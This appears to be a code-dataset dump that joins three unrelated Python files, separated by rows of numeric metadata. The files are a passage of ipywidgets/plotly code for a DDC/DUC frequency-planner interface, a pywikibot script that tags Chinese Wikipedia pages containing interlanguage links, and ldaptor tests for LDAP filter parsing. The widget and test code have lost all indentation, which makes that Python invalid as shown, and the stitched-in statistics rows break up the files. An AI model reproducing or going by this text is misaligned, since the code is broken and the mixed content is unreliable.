self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fc_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
self.fc_slider.observe(self.__update_fc, 'value')
self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.4, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.pll_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
self.pll_slider.observe(self.__update_pll, 'value')
self.dec_label = widgets.Label("Decimation", layout=self._label_layout)
self.dec_blank = widgets.Label("", layout=self._slider_layout)
self.dec_entry = widgets.Dropdown(options=["1", "2","4","8"],value=str(self.data.dec), layout=self._entry_layout)
self.dec_units = widgets.Label("X", layout=self._units_layout)
self.dec_entry.observe(self.__update_dec, 'value')
self.il_label = widgets.Label("IL Factor", layout=self._label_layout)
self.il_blank = widgets.Label("", layout=self._slider_layout)
self.il_entry = widgets.Dropdown(options=["4","8"],value=str(self.data.il_factor), layout=self._entry_layout)
self.il_units = widgets.Label("X", layout=self._units_layout)
self.il_entry.observe(self.__update_il, 'value')
self.nco_label = widgets.Label("NCO", layout=self._label_layout)
self.nco_slider = widgets.FloatSlider(value=self.data.nco, min=-4096.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
self.nco_entry = widgets.BoundedFloatText(value=self.nco_slider.value, min=self.nco_slider.min, max=self.nco_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.nco_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.nco_slider, 'value'), (self.nco_entry, 'value'))
self.nco_slider.observe(self.__update_nco, 'value')
self.hd2_label = widgets.Label("HD2", layout=self._label_layout)
self.hd2_slider = widgets.FloatSlider(value=self.data.hd2_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.hd2_entry = widgets.BoundedFloatText(value=self.hd2_slider.value, min=self.hd2_slider.min, max=self.hd2_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.hd2_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.hd2_slider, 'value'), (self.hd2_entry, 'value'))
self.hd2_slider.observe(self.__update_hd2, 'value')
self.hd3_label = widgets.Label("HD3", layout=self._label_layout)
self.hd3_slider = widgets.FloatSlider(value=self.data.hd3_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.hd3_entry = widgets.BoundedFloatText(value=self.hd3_slider.value, min=self.hd3_slider.min, max=self.hd3_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.hd3_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.hd3_slider, 'value'), (self.hd3_entry, 'value'))
self.hd3_slider.observe(self.__update_hd3, 'value')
self.tis_label = widgets.Label("GTIS", layout=self._label_layout)
self.tis_slider = widgets.FloatSlider(value=self.data.tis_spur_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.tis_entry = widgets.BoundedFloatText(value=self.tis_slider.value, min=self.tis_slider.min, max=self.tis_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.tis_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.tis_slider, 'value'), (self.tis_entry, 'value'))
self.tis_slider.observe(self.__update_tis, 'value')
self.oss_label = widgets.Label("OIS", layout=self._label_layout)
self.oss_slider = widgets.FloatSlider(value=self.data.off_spur_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.oss_entry = widgets.BoundedFloatText(value=self.oss_slider.value, min=self.oss_slider.min, max=self.oss_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.oss_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.oss_slider, 'value'), (self.oss_entry, 'value'))
self.oss_slider.observe(self.__update_oss, 'value')
self.pdb_label = widgets.Label("PLL Ref Mixing", layout=self._label_layout)
self.pdb_slider = widgets.FloatSlider(value=self.data.pll_mix_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.pdb_entry = widgets.BoundedFloatText(value=self.pdb_slider.value, min=self.pdb_slider.min, max=self.pdb_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.pdb_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.pdb_slider, 'value'), (self.pdb_entry, 'value'))
self.pdb_slider.observe(self.__update_pdb, 'value')
self.nsd_label = widgets.Label("NSD", layout=self._label_layout)
self.nsd_slider = widgets.FloatSlider(value=self.data.nsd_db, min=-300, max=0, step=0.01, readout=False, layout=self._slider_layout)
self.nsd_entry = widgets.BoundedFloatText(value=self.nsd_slider.value, min=self.nsd_slider.min, max=self.nsd_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.nsd_units = widgets.Label("dBFs/Hz", layout=self._units_layout)
widgets.jslink((self.nsd_slider, 'value'), (self.nsd_entry, 'value'))
self.nsd_slider.observe(self.__update_nsd, 'value')
self.param_controls = widgets.Accordion([widgets.VBox([
widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units]),
widgets.HBox([self.nco_label, self.nco_slider, self.nco_entry, self.nco_units]),
widgets.HBox([self.dec_label, self.dec_blank, self.dec_entry, self.dec_units]),
widgets.HBox([self.il_label, self.il_blank, self.il_entry, self.il_units])])
])
self.param_controls.set_title(0,"RF-DC Parameters")
self.amp_controls = widgets.Accordion([widgets.VBox([
widgets.HBox([self.hd2_label, self.hd2_slider, self.hd2_entry, self.hd2_units]),
widgets.HBox([self.hd3_label, self.hd3_slider, self.hd3_entry, self.hd3_units]),
widgets.HBox([self.tis_label, self.tis_slider, self.tis_entry, self.tis_units]),
widgets.HBox([self.oss_label, self.oss_slider, self.oss_entry, self.oss_units]),
widgets.HBox([self.pdb_label, self.pdb_slider, self.pdb_entry, self.pdb_units]),
widgets.HBox([self.nsd_label, self.nsd_slider, self.nsd_entry, self.nsd_units])])
])
self.amp_controls.set_title(0,"Spur Amplitude")
self.params = widgets.VBox([self.param_controls, self.amp_controls])
self.layout = widgets.HBox([self.params, self._plot])
def __update_fs(self, change):
self.data.fs_rf = change['new']
self.__update_plot()
def __update_fc(self, change):
self.data.fc = change['new']
self.__update_plot()
def __update_dec(self, change):
self.data.dec = int(change['new'])
self.__update_plot()
def __update_il(self, change):
self.data.il_factor = int(change['new'])
self.__update_plot()
def __update_pll(self, change):
self.data.pll_ref = change['new']
self.__update_plot()
def __update_nco(self, change):
self.data.nco = change['new']
self.__update_plot()
def __update_hd2(self, change):
self.data.hd2_db = change['new']
self.__update_plot()
def __update_hd3(self, change):
self.data.hd3_db = change['new']
self.__update_plot()
def __update_tis(self, change):
self.data.tis_spur_db = change['new']
self.__update_plot()
def __update_oss(self, change):
self.data.off_spur_db = change['new']
self.__update_plot()
def __update_pdb(self, change):
self.data.pll_mix_db = change['new']
self.__update_plot()
def __update_nsd(self, change):
self.data.nsd_db = change['new']
self.__update_plot()
def __setup_plot(self):
spurs_list = [self.data.rx_alias, self.data.rx_image, self.data.nyquist_up, self.data.nyquist_down,
self.data.hd2, self.data.hd2_image, self.data.hd3, self.data.hd3_image,
self.data.pll_mix_up, self.data.pll_mix_up_image, self.data.pll_mix_down, self.data.pll_mix_down_image,
self.data.tis_spur, self.data.tis_spur_image, self.data.offset_spur, self.data.offset_spur_image]
plot_items = [go.Scatter(x=[d['x'], d['x']], y=[d['ymin'], d['ymax']], name=d['label'], line=dict(color=d['color']), hovertext=d['label'], hoverinfo='text+x') for d in spurs_list]
plot = go.FigureWidget(plot_items)
plot.update_layout(
title={'text':"Digital Down Converter (DDC)", 'x':0.45, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
xaxis_title={'text':"Frequency (MHz)"},
yaxis_title={'text':"Amplitude (dB)"},
width=plot_width,
height=plot_height
)
# plot.add_hline(y=0, line=dict(color='grey'))
return plot
def __update_plot(self):
spurs_list = [self.data.rx_alias, self.data.rx_image, self.data.nyquist_up, self.data.nyquist_down,
self.data.hd2, self.data.hd2_image, self.data.hd3, self.data.hd3_image,
self.data.pll_mix_up, self.data.pll_mix_up_image, self.data.pll_mix_down, self.data.pll_mix_down_image,
self.data.tis_spur, self.data.tis_spur_image, self.data.offset_spur, self.data.offset_spur_image]
with self._plot.batch_update():
for i in range(len(spurs_list)):
self._plot.data[i].x = [spurs_list[i]['x'], spurs_list[i]['x']]
self._plot.data[i].y = [spurs_list[i]['ymin'], spurs_list[i]['ymax']]
class DUCWidgets:
def __init__(self):
self.data = FrequencyPlannerDUC()
self._plot = self.__setup_plot()
self._label_layout = widgets.Layout(width='90px')
self._slider_layout = widgets.Layout(width='120px')
self._entry_layout = widgets.Layout(width='90px')
self._units_layout = widgets.Layout(width='37px')
self._button_layout = widgets.Layout(width='87px', fontsize=12)
self.fs_label = widgets.Label("Fs", layout=self._label_layout)
self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
self.fs_slider.observe(self.__update_fs, 'value')
self.fc_label = widgets.Label("Fc", layout=self._label_layout)
self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.fc_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
self.fc_slider.observe(self.__update_fc, 'value')
self.nco_label = widgets.Label("NCO", layout=self._label_layout)
self.nco_slider = widgets.FloatSlider(value=self.data.nco, min=-6554.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
self.nco_entry = widgets.BoundedFloatText(value=self.nco_slider.value, min=self.nco_slider.min, max=self.nco_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.nco_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.nco_slider, 'value'), (self.nco_entry, 'value'))
self.nco_slider.observe(self.__update_nco, 'value')
self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.4, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.pll_units = widgets.Label("MHz", layout=self._units_layout)
widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
self.pll_slider.observe(self.__update_pll, 'value')
self.itrp_label = widgets.Label("Interpolation", layout=self._label_layout)
self.itrp_blank = widgets.Label("", layout=self._slider_layout)
self.itrp_entry = widgets.Dropdown(options=["1", "2","4","8"],value=str(self.data.interp_rate), layout=self._entry_layout)
self.itrp_units = widgets.Label("X", layout=self._units_layout)
self.itrp_entry.observe(self.__update_itrp, 'value')
self.sinc_label = widgets.Label("Inverse Sinc", layout=self._label_layout)
self.sinc_blank = widgets.Label("", layout=self._slider_layout)
self.sinc_entry = widgets.Dropdown(options=["ON", "OFF"],value="ON", layout=self._entry_layout)
self.sinc_units = widgets.Label("X", layout=self._units_layout)
self.sinc_entry.observe(self.__update_sinc, 'value')
self.hd2_label = widgets.Label("HD2", layout=self._label_layout)
self.hd2_slider = widgets.FloatSlider(value=self.data.hd2_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.hd2_entry = widgets.BoundedFloatText(value=self.hd2_slider.value, min=self.hd2_slider.min, max=self.hd2_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.hd2_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.hd2_slider, 'value'), (self.hd2_entry, 'value'))
self.hd2_slider.observe(self.__update_hd2, 'value')
self.hd3_label = widgets.Label("HD3", layout=self._label_layout)
self.hd3_slider = widgets.FloatSlider(value=self.data.hd3_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.hd3_entry = widgets.BoundedFloatText(value=self.hd3_slider.value, min=self.hd3_slider.min, max=self.hd3_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.hd3_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.hd3_slider, 'value'), (self.hd3_entry, 'value'))
self.hd3_slider.observe(self.__update_hd3, 'value')
self.pdb_label = widgets.Label("PLL Ref Mixing", layout=self._label_layout)
self.pdb_slider = widgets.FloatSlider(value=self.data.pll_db, min=0, max=200, step=0.01, readout=False, layout=self._slider_layout)
self.pdb_entry = widgets.BoundedFloatText(value=self.pdb_slider.value, min=self.pdb_slider.min, max=self.pdb_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
self.pdb_units = widgets.Label("dB", layout=self._units_layout)
widgets.jslink((self.pdb_slider, 'value'), (self.pdb_entry, 'value'))
self.pdb_slider.observe(self.__update_pdb, 'value')
self.mix_mode = widgets.Label(self.data.mix_mode, layout=widgets.Layout(flex='auto'))
self.eff_fs = widgets.Label(("Effective Fs: " + str(self.data.effective_fs)) + " MSPS", layout=widgets.Layout(flex='auto'))
self.param_controls = widgets.Accordion([widgets.VBox([
widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units]),
widgets.HBox([self.nco_label, self.nco_slider, self.nco_entry, self.nco_units]),
widgets.HBox([self.itrp_label, self.itrp_blank, self.itrp_entry, self.itrp_units]),
widgets.HBox([self.sinc_label, self.sinc_blank, self.sinc_entry, self.sinc_units])])
])
self.param_controls.set_title(0, "RF-DC Parameters")
self.amp_controls = widgets.Accordion([widgets.VBox([
widgets.HBox([self.hd2_label, self.hd2_slider, self.hd2_entry, self.hd2_units]),
widgets.HBox([self.hd3_label, self.hd3_slider, self.hd3_entry, self.hd3_units]),
widgets.HBox([self.pdb_label, self.pdb_slider, self.pdb_entry, self.pdb_units])])
])
self.amp_controls.set_title(0, "Spur Amplitude")
self.params = widgets.VBox([
self.param_controls,
self.amp_controls,
widgets.HBox([self.mix_mode]),
widgets.HBox([self.eff_fs])
])
self.layout = widgets.HBox([self.params, self._plot])
def __update_fs(self, change):
self.data.fs_rf = change['new']
self.__update_plot()
def __update_fc(self, change):
self.data.fc = change['new']
self.__update_plot()
def __update_pll(self, change):
self.data.pll_ref = change['new']
self.__update_plot()
def __update_nco(self, change):
self.data.nco = change['new']
self.__update_plot()
def __update_itrp(self, change):
self.data.interp_rate = int(change['new'])
self.__update_plot()
def __update_sinc(self, change):
if change['new'] == "ON":
self.data.inv_sinc = True
else:
self.data.inv_sinc = False
self.__update_plot()
def __update_hd2(self, change):
self.data.hd2_db = change['new']
self.__update_plot()
def __update_hd3(self, change):
self.data.hd3_db = change['new']
self.__update_plot()
def __update_pdb(self, change):
self.data.pll_db = change['new']
self.__update_plot()
def __setup_plot(self):
spurs_list = [self.data.fund, self.data.fimag,
self.data.nyquist_up, self.data.nyquist_down, self.data.hd2, self.data.hd2_image,
self.data.hd3, self.data.hd3_image, self.data.pll_mix_up, self.data.pll_mix_up_image,
self.data.pll_mix_down, self.data.pll_mix_down_image]
plot_items = [go.Scatter(x=[d['x'], d['x']], y=[d['ymin'], d['ymax']], name=d['label'], line=dict(color=d['color']), hovertext=d['label'], hoverinfo='text+x') for d in spurs_list]
plot = go.FigureWidget(plot_items)
plot.update_layout(
title={'text':"Digital Up Converter (DUC)", 'x':0.46, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
xaxis_title={'text':"Frequency (MHz)"},
yaxis_title={'text':"Amplitude (dB)"},
width=plot_width,
height=plot_height
)
# plot.add_hline(y=0, line=dict(color='grey'))
return plot
def __update_plot(self):
spurs_list = [self.data.fund, self.data.fimag,
self.data.nyquist_up, self.data.nyquist_down, self.data.hd2, self.data.hd2_image,
self.data.hd3, self.data.hd3_image, self.data.pll_mix_up, self.data.pll_mix_up_image,
self.data.pll_mix_down, self.data.pll_mix_down_image]
with self._plot.batch_update():
for i in range(len(spurs_list)):
self._plot.data[i].x = [spurs_list[i]['x'], spurs_list[i]['x']]
self._plot.data[i].y = [spurs_list[i]['ymin'], spurs_list[i]['ymax']]
self.mix_mode.value = self.data.mix_mode
self.eff_fs.value = ("Effective Fs: " + str(self.data.effective_fs) + " MSPS")
| 62.22807
| 324
| 0.65203
| 6,036
| 42,564
| 4.34609
| 0.041584
| 0.093013
| 0.013342
| 0.024016
| 0.918157
| 0.891206
| 0.872565
| 0.862616
| 0.84691
| 0.828537
| 0
| 0.01901
| 0.195447
| 42,564
| 683
| 325
| 62.31918
| 0.747029
| 0.004464
| 0
| 0.720887
| 0
| 0
| 0.055158
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081331
| false
| 0
| 0.005545
| 0
| 0.109057
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d21e5b0d028aff25fdff617afe0a9aa252c38c5a
| 4,594
|
py
|
Python
|
marklinkstyle.py
|
Peace1-zhwiki/MOSIW
|
13a97842ef53fd500296d3569e548a83e12698d1
|
[
"MIT"
] | null | null | null |
marklinkstyle.py
|
Peace1-zhwiki/MOSIW
|
13a97842ef53fd500296d3569e548a83e12698d1
|
[
"MIT"
] | null | null | null |
marklinkstyle.py
|
Peace1-zhwiki/MOSIW
|
13a97842ef53fd500296d3569e548a83e12698d1
|
[
"MIT"
] | null | null | null |
import pywikibot
from pywikibot import pagegenerators
import regex as re #use this rather than "re" to avoid the "look-behind requires fixed-width pattern" error
site = pywikibot.Site('zh','wikipedia')
ilh_search0='insource:/\[\[\:([A-Za-z\-]{2,})\:/i'
ilh_search='\[\[\:(aa|ab|ace|ady|af|ak|als|am|an|ang|ar|arc|arz|as|ast|av|ay|az|azb|ba|bar|bat-smg|bcl|be|be-tarask|be-x-old|bg|bh|bi|bjn|bm|bn|bo|bpy|br|bs|bug|bxr|ca|cbk-zam|cdo|ce|ceb|ch|cho|chr|chy|ckb|co|cr|crh|cs|csb|cu|cv|cy|da|de|diq|dsb|dv|dz|ee|egl|eml|el|en|eo|es|et|eu|ext|fa|ff|fi|fiu-vro|fj|fo|fr|frp|frr|fur|fy|ga|gag|gan|gd|gl|glk|gn|gom|got|gsw|als|gu|gv|ha|hak|haw|he|hi|hif|ho|hr|hsb|ht|hu|hy|hz|ia|id|ie|ig|ii|ik|ilo|io|is|it|iu|ja|jp|jam|jbo|jv|ka|kaa|kab|kbd|kg|ki|kj|kk|kl|km|kn|ko|koi|kr|krc|ks|ksh|ku|kv|kw|ky|la|lad|lb|lbe|lez|lg|li|lij|lmo|ln|lo|lrc|lt|ltg|lv|lzh|zh-classical|mai|map-bms|mdf|mg|mh|mhr|mi|min|mk|ml|mn|mo|mr|mrj|ms|mt|mus|mwl|my|myv|mzn|na|nah|nan|zh-min-nan|nap|nb|no|nds|nds-nl|ne|ne|new|ng|nl|nn|no|nov|nrm|nso|nv|ny|oc|olo|om|or|os|pa|pag|pam|pap|pcd|pdc|pfl|pi|pih|pl|pms|pnb|pnt|ps|pt|qu|rm|rmy|rn|ro|roa-rup|roa-tara|ru|rue|rup|rw|sa|sah|sc|scn|sco|sd|se|sg|sgs|sh|si|simple|sk|sl|sm|sn|so|sq|sr|srn|ss|st|stq|su|sv|sw|szl|ta|tcy|te|tet|tg|th|ti|tk|tl|tn|to|tpi|tr|ts|tt|tum|tw|ty|tyv|udm|ug|uk|ur|uz|ve|vec|vep|vi|vls|vo|vro|wa|war|wo|wuu|xal|xh|xmf|yi|yo|yue|zh-yue|za|zea|zu)\:(?!(wiktionary|wikt|wikinews|n|wikibooks|b|wikiquote|q|wikisource|s|oldwikisource|species|wikispecies|wikiversity|v|betawikiversity|wikimedia|foundation|wmf|wikivoyage|voy|commons|c|meta|metawikipedia|m|strategy|incubator|mediawikiwiki|mw|mediawiki|quality|otrswiki|otrs|ticket|phabricator|bugzilla|mediazilla|phab|nost|testwiki|wikidata|d|outreach|outreachwiki|toollabs|wikitech|dbdump|download|gerrit|mail|mailarchive|rev|spcom|sulutil|svn|tools|tswiki|wm2016|wm2017|wmania|User|Wikipedia|MediaWiki|Template|Help|File|Image|WP|Project|U|Special|利用者)\:)'
ilh='(?<!\{\{(Advtranslation|Plant\-translation|Translate|Translating|Translation[ _]+WIP|Translation|Trans|Tran|Voltranslation|Wptranslation|正在翻(譯|译)|(翻)?(譯|译)(中)?)[^\}]*)\[\[\:(aa|ab|ace|ady|af|ak|als|am|an|ang|ar|arc|arz|as|ast|av|ay|az|azb|ba|bar|bat-smg|bcl|be|be-tarask|be-x-old|bg|bh|bi|bjn|bm|bn|bo|bpy|br|bs|bug|bxr|ca|cbk-zam|cdo|ce|ceb|ch|cho|chr|chy|ckb|co|cr|crh|cs|csb|cu|cv|cy|da|de|diq|dsb|dv|dz|ee|egl|eml|el|en|eo|es|et|eu|ext|fa|ff|fi|fiu-vro|fj|fo|fr|frp|frr|fur|fy|ga|gag|gan|gd|gl|glk|gn|gom|got|gsw|als|gu|gv|ha|hak|haw|he|hi|hif|ho|hr|hsb|ht|hu|hy|hz|ia|id|ie|ig|ii|ik|ilo|io|is|it|iu|ja|jp|jam|jbo|jv|ka|kaa|kab|kbd|kg|ki|kj|kk|kl|km|kn|ko|koi|kr|krc|ks|ksh|ku|kv|kw|ky|la|lad|lb|lbe|lez|lg|li|lij|lmo|ln|lo|lrc|lt|ltg|lv|lzh|zh-classical|mai|map-bms|mdf|mg|mh|mhr|mi|min|mk|ml|mn|mo|mr|mrj|ms|mt|mus|mwl|my|myv|mzn|na|nah|nan|zh-min-nan|nap|nb|no|nds|nds-nl|ne|ne|new|ng|nl|nn|no|nov|nrm|nso|nv|ny|oc|olo|om|or|os|pa|pag|pam|pap|pcd|pdc|pfl|pi|pih|pl|pms|pnb|pnt|ps|pt|qu|rm|rmy|rn|ro|roa-rup|roa-tara|ru|rue|rup|rw|sa|sah|sc|scn|sco|sd|se|sg|sgs|sh|si|simple|sk|sl|sm|sn|so|sq|sr|srn|ss|st|stq|su|sv|sw|szl|ta|tcy|te|tet|tg|th|ti|tk|tl|tn|to|tpi|tr|ts|tt|tum|tw|ty|tyv|udm|ug|uk|ur|uz|ve|vec|vep|vi|vls|vo|vro|wa|war|wo|wuu|xal|xh|xmf|yi|yo|yue|zh-yue|za|zea|zu)\:(?!(wiktionary|wikt|wikinews|n|wikibooks|b|wikiquote|q|wikisource|s|oldwikisource|species|wikispecies|wikiversity|v|betawikiversity|wikimedia|foundation|wmf|wikivoyage|voy|commons|c|meta|metawikipedia|m|strategy|incubator|mediawikiwiki|mw|mediawiki|quality|otrswiki|otrs|ticket|phabricator|bugzilla|mediazilla|phab|nost|testwiki|wikidata|d|outreach|outreachwiki|toollabs|wikitech|dbdump|download|gerrit|mail|mailarchive|rev|spcom|sulutil|svn|tools|tswiki|wm2016|wm2017|wmania|User|Wikipedia|MediaWiki|Template|Help|File|Image|WP|Project|U|Special|利用者)\:)'
count=0
gen0 = site.search(ilh_search0,namespaces=0)
#ilh_search is too long for site.search and leads to "pywikibot.data.api.APIError: cirrussearch-query-too-long".
gen1 = pagegenerators.RegexBodyFilterPageGenerator(gen0, ilh_search, quantifier='any')
#ilh would cause "re.error: look-behind requires fixed-width pattern" because RegexBodyFilterPageGenerator uses "re" rather than "regex" package.
gen = pagegenerators.RegexBodyFilterPageGenerator(gen1, '\{\{Link style', quantifier='none')
#Skip pages with {{Link style}}.
for page in gen:
count+=1
art_txt = page.text
ilh_list = re.findall(ilh,art_txt,re.I)
print(count,page.title(),len(ilh_list))
if(len(ilh_list)==0): continue
page.text = '{{subst:Link style/auto}}\n' + art_txt
page.save(u"機器人:標記不合[[WP:MOSIW|跨語言連結規範]]之頁面")
print('Done')
| 153.133333
| 1,846
| 0.751197
| 970
| 4,594
| 3.545361
| 0.48866
| 0.007851
| 0.010468
| 0.013376
| 0.754289
| 0.754289
| 0.733934
| 0.733934
| 0.733934
| 0.733934
| 0
| 0.006024
| 0.02438
| 4,594
| 30
| 1,847
| 153.133333
| 0.761267
| 0.081193
| 0
| 0
| 0
| 0.1
| 0.863679
| 0.848506
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.15
| 0
| 0.15
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d24aa78c3f67083c72f8a9e249dd829206a5de58
| 22,579
|
py
|
Python
|
ldaptor/test/test_ldapfilter.py
|
arossert/ldaptor
|
6ed55a380f05dd47aa0d03ead0ff214e26399df0
|
[
"MIT"
] | null | null | null |
ldaptor/test/test_ldapfilter.py
|
arossert/ldaptor
|
6ed55a380f05dd47aa0d03ead0ff214e26399df0
|
[
"MIT"
] | null | null | null |
ldaptor/test/test_ldapfilter.py
|
arossert/ldaptor
|
6ed55a380f05dd47aa0d03ead0ff214e26399df0
|
[
"MIT"
] | null | null | null |
"""
Test cases for ldaptor.protocols.ldap.ldapfilter module.
"""
from twisted.trial import unittest
from ldaptor.protocols import pureldap
from ldaptor import ldapfilter
class RFC2254Examples(unittest.TestCase):
def test_cn(self):
text = '(cn=Babs Jensen)'
filt = pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='Babs Jensen'))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_not_cn(self):
text = '(!(cn=Tim Howes))'
filt = pureldap.LDAPFilter_not(
pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
assertionValue=pureldap.LDAPAssertionValue(value='Tim Howes')))
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_and_or(self):
text = '(&(objectClass=Person)(|(sn=Jensen)(cn=Babs J*)))'
filt = pureldap.LDAPFilter_and(
[ pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='objectClass'),
assertionValue=pureldap.LDAPAssertionValue(value='Person')),
pureldap.LDAPFilter_or([ pureldap.LDAPFilter_equalityMatch(
attributeDesc=pureldap.LDAPAttributeDescription(value='sn'),
assertionValue=pureldap.LDAPAssertionValue(value='Jensen')),
pureldap.LDAPFilter_substrings(
type='cn',
substrings=[ pureldap.LDAPFilter_substrings_initial(value='Babs J')
])
]),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_substrings(self):
text = '(o=univ*of*mich*)'
filt = pureldap.LDAPFilter_substrings(
type='o',
substrings=[ pureldap.LDAPFilter_substrings_initial(value='univ'),
pureldap.LDAPFilter_substrings_any(value='of'),
pureldap.LDAPFilter_substrings_any(value='mich'),
])
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_extensible_1(self):
text = '(cn:1.2.3.4.5:=Fred Flintstone)'
filt = pureldap.LDAPFilter_extensibleMatch(
type='cn',
dnAttributes=False,
matchingRule='1.2.3.4.5',
matchValue='Fred Flintstone',
)
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_extensible_2(self):
text = '(sn:dn:2.4.6.8.10:=Barney Rubble)'
filt = pureldap.LDAPFilter_extensibleMatch(
type='sn',
dnAttributes=True,
matchingRule='2.4.6.8.10',
matchValue='Barney Rubble',
)
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_extensible_3(self):
text = '(o:dn:=Ace Industry)'
filt = pureldap.LDAPFilter_extensibleMatch(
type='o',
dnAttributes=True,
matchingRule=None,
matchValue='Ace Industry',
)
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_extensible_4(self):
text = '(:dn:2.4.6.8.10:=Dino)'
filt = pureldap.LDAPFilter_extensibleMatch(
type=None,
dnAttributes=True,
matchingRule='2.4.6.8.10',
matchValue='Dino',
)
self.assertEqual(ldapfilter.parseFilter(text), filt)
self.assertEqual(filt.asText(), text)
def test_extensible_5(self):
text = '(cn:1.2.3.4.5:=Fred Flintstone)'
filt = pureldap.LDAPFilter_extensibleMatch(
type='cn',
dnAttributes=None,
matchingRule='1.2.3.4.5',
matchValue='Fred Flintstone',
)
self.assertEqual(filt.asText(), text)
